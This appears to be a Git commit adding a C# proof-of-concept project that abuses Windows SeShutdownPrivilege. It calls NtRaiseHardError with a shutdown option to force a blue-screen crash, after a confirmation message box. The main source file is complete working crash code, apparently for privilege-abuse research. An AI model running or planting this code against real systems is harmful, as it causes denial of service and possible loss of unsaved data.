1 parent
ddfec09
commit e4e702b
Showing
6 changed files
with
327 additions
and
1 deletion.
@@ -0,0 +1,6 @@ | ||
<?xml version="1.0" encoding="utf-8" ?> | ||
<configuration> | ||
<startup> | ||
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /> | ||
</startup> | ||
</configuration> |
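--- a/PrivilegedOperations/SeShutdownPrivilegePoC/Properties/AssemblyInfo.cs
+++ b/PrivilegedOperations/SeShutdownPrivilegePoC/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("SeShutdownPrivilegePoC")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("SeShutdownPrivilegePoC")]
+[assembly: AssemblyCopyright("Copyright © 2022")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("9e36ae6e-b9fd-4b9b-99ba-42d3eacd7506")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]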
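--- a/PrivilegedOperations/SeShutdownPrivilegePoC/SeShutdownPrivilegePoC.cs
+++ b/PrivilegedOperations/SeShutdownPrivilegePoC/SeShutdownPrivilegePoC.cs
@@ -0,0 +1,224 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Runtime.InteropServices;
+
+namespace SeShutdownPrivilegePoC
+{
+class SeShutdownPrivilegePoC
+{
+/*
+* P/Invoke : Enums
+*/
+[Flags]
+enum FormatMessageFlags : uint
+{
+FORMAT_MESSAGE_ALLOCATE_BUFFER = 0x00000100,
+FORMAT_MESSAGE_IGNORE_INSERTS = 0x00000200,
+FORMAT_MESSAGE_FROM_STRING = 0x00000400,
+FORMAT_MESSAGE_FROM_HMODULE = 0x00000800,
+FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000,
+FORMAT_MESSAGE_ARGUMENT_ARRAY = 0x00002000
+}
+
+enum HARDERROR_RESPONSE
+{
+ResponseReturnToCaller,
+ResponseNotHandled,
+ResponseAbort,
+ResponseCancel,
+ResponseIgnore,
+ResponseNo,
+ResponseOk,
+ResponseRetry,
+ResponseYes
+}
+
+enum HARDERROR_RESPONSE_OPTION
+{
+OptionAbortRetryIgnore,
+OptionOk,
+OptionOkCancel,
+OptionRetryCancel,
+OptionYesNo,
+OptionYesNoCancel,
+OptionShutdownSystem
+}
+
+enum MESSAGEBOX_RETURN
+{
+IDOK = 1,
+IDCANCEL = 2,
+IDABORT = 3,
+IDRETRY = 4,
+IDIGNORE = 5,
+IDYES = 6,
+IDNO = 7,
+IDTRYAGAIN = 10,
+IDCONTINUE = 11
+}
+
+enum MESSAGEBOX_TYPE : uint
+{
+MB_APPLMODAL = 0x00000000u,
+MB_DEFBUTTON1 = 0x00000000u,
+MB_OK = 0x00000000u,
+MB_OKCANCEL = 0x00000001u,
+MB_ABORTRETRYIGNORE = 0x00000002u,
+MB_YESNOCANCEL = 0x00000003u,
+MB_YESNO = 0x00000004u,
+MB_RETRYCANCEL = 0x00000005u,
+MB_CANCELTRYCONTINUE = 0x00000006u,
+MB_ICONSTOP = 0x00000010u,
+MB_ICONERROR = 0x00000010u,
+MB_ICONHAND = 0x00000010u,
+MB_ICONQUESTION = 0x00000020u,
+MB_ICONEXCLAMATION = 0x00000030u,
+MB_ICONWARNING = 0x00000030u,
+MB_ICONINFORMATION = 0x00000040u,
+MB_ICONASTERISK = 0x00000040u,
+MB_DEFBUTTON2 = 0x00000100u,
+MB_DEFBUTTON3 = 0x00000200u,
+MB_DEFBUTTON4 = 0x00000300u,
+MB_SYSTEMMODAL = 0x00001000u,
+MB_TASKMODAL = 0x00002000u,
+MB_HELP = 0x00004000u,
+MB_SETFOREGROUND = 0x00010000u,
+MB_DEFAULT_DESKTOP_ONLY = 0x00020000u,
+MB_TOPMOST = 0x00040000u,
+MB_RIGHT = 0x00080000u,
+MB_RTLREADING = 0x00100000u,
+MB_SERVICE_NOTIFICATION = 0x00200000u
+}
+
+/*
+* P/Invoke : Win32 APIs
+*/
+[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
+static extern int FormatMessage(
+FormatMessageFlags dwFlags,
+IntPtr lpSource,
+int dwMessageId,
+int dwLanguageId,
+StringBuilder lpBuffer,
+int nSize,
+IntPtr Arguments);
+
+[DllImport("kernel32.dll", SetLastError = true)]
+static extern bool FreeLibrary(IntPtr hLibModule);
+
+[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Ansi)]
+static extern IntPtr LoadLibrary(string lpFileName);
+
+[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
+static extern int MessageBox(
+IntPtr hWnd,
+string lpText,
+string lpCaption,
+MESSAGEBOX_TYPE uType);
+
+[DllImport("ntdll.dll")]
+static extern int NtRaiseHardError(
+int ErrorStatus,
+uint NumberOfParameters,
+IntPtr /* PUNICODE_STRING */ UnicodeStringParameterMask,
+IntPtr Parameters,
+HARDERROR_RESPONSE_OPTION ResponseOption,
+out HARDERROR_RESPONSE Response );
+
+
+static string GetWin32ErrorMessage(int code, bool isNtStatus)
+{
+var message = new StringBuilder();
+var messageSize = 255;
+FormatMessageFlags messageFlag;
+IntPtr pNtdll;
+message.Capacity = messageSize;
+
+if (isNtStatus)
+{
+pNtdll = LoadLibrary("ntdll.dll");
+messageFlag = FormatMessageFlags.FORMAT_MESSAGE_FROM_HMODULE |
+FormatMessageFlags.FORMAT_MESSAGE_FROM_SYSTEM;
+}
+else
+{
+pNtdll = IntPtr.Zero;
+messageFlag = FormatMessageFlags.FORMAT_MESSAGE_FROM_SYSTEM;
+}
+
+int ret = FormatMessage(
+messageFlag,
+pNtdll,
+code,
+0,
+message,
+messageSize,
+IntPtr.Zero);
+
+if (isNtStatus)
+FreeLibrary(pNtdll);
+
+if (ret == 0)
+{
+return string.Format("[ERROR] Code 0x{0}", code.ToString("X8"));
+}
+else
+{
+return string.Format(
+"[ERROR] Code 0x{0} : {1}",
+code.ToString("X8"),
+message.ToString().Trim());
+}
+}
+
+static bool RaiseBSOD()
+{
+int STATUS_SUCCESS = 0;
+int STATUS_ACCESS_VIOLATION = Convert.ToInt32("0xC0000005", 16);
+
+int ntstatus = NtRaiseHardError(
+STATUS_ACCESS_VIOLATION,
+0,
+IntPtr.Zero,
+IntPtr.Zero,
+HARDERROR_RESPONSE_OPTION.OptionShutdownSystem,
+out HARDERROR_RESPONSE Response);
+
+if (ntstatus != STATUS_SUCCESS)
+{
+Console.WriteLine("[-] Failed to raise hard error.");
+Console.WriteLine(" |-> {0}\n", GetWin32ErrorMessage(ntstatus, true));
+
+return false;
+}
+
+Console.WriteLine("[+] NtRaiseHardError API is called successfully.");
+
+return true;
+}
+
+static void Main()
+{
+Console.WriteLine("[*] If you have SeShutdownPrivilege, you can raise hard error.");
+Console.WriteLine("[*] This PoC tries to cause BSOD with hard error.");
+
+int ret = MessageBox(
+IntPtr.Zero,
+"This PoC will cause BSOD.\nAre you ready?",
+"Alert",
+MESSAGEBOX_TYPE.MB_OKCANCEL);
+
+if ((MESSAGEBOX_RETURN)ret != MESSAGEBOX_RETURN.IDOK)
+{
+Console.WriteLine("[*] Abort.");
+return;
+}
+
+Console.WriteLine("[>] Trying to raise hardware error.");
+
+RaiseBSOD();
+}
+}
+}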
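--- a/PrivilegedOperations/SeShutdownPrivilegePoC/SeShutdownPrivilegePoC.csproj
+++ b/PrivilegedOperations/SeShutdownPrivilegePoC/SeShutdownPrivilegePoC.csproj
@@ -0,0 +1,54 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+<PropertyGroup>
+<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+<ProjectGuid>{9E36AE6E-B9FD-4B9B-99BA-42D3EACD7506}</ProjectGuid>
+<OutputType>Exe</OutputType>
+<RootNamespace>SeShutdownPrivilegePoC</RootNamespace>
+<AssemblyName>SeShutdownPrivilegePoC</AssemblyName>
+<TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
+<FileAlignment>512</FileAlignment>
+<Deterministic>true</Deterministic>
+</PropertyGroup>
+<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+<PlatformTarget>AnyCPU</PlatformTarget>
+<DebugSymbols>true</DebugSymbols>
+<DebugType>full</DebugType>
+<Optimize>false</Optimize>
+<OutputPath>..\bin\Debug\</OutputPath>
+<DefineConstants>DEBUG;TRACE</DefineConstants>
+<ErrorReport>prompt</ErrorReport>
+<WarningLevel>4</WarningLevel>
+<Prefer32Bit>false</Prefer32Bit>
+</PropertyGroup>
+<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+<PlatformTarget>AnyCPU</PlatformTarget>
+<DebugType>pdbonly</DebugType>
+<Optimize>true</Optimize>
+<OutputPath>..\bin\Release\</OutputPath>
+<DefineConstants>TRACE</DefineConstants>
+<ErrorReport>prompt</ErrorReport>
+<WarningLevel>4</WarningLevel>
+<Prefer32Bit>false</Prefer32Bit>
+</PropertyGroup>
+<ItemGroup>
+<Reference Include="System" />
+<Reference Include="System.Core" />
+<Reference Include="System.Xml.Linq" />
+<Reference Include="System.Data.DataSetExtensions" />
+<Reference Include="Microsoft.CSharp" />
+<Reference Include="System.Data" />
+<Reference Include="System.Net.Http" />
+<Reference Include="System.Xml" />
+</ItemGroup>
+<ItemGroup>
+<Compile Include="SeShutdownPrivilegePoC.cs" />
+<Compile Include="Properties\AssemblyInfo.cs" />
+</ItemGroup>
+<ItemGroup>
+<None Include="App.config" />
+</ItemGroup>
+<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+</Project>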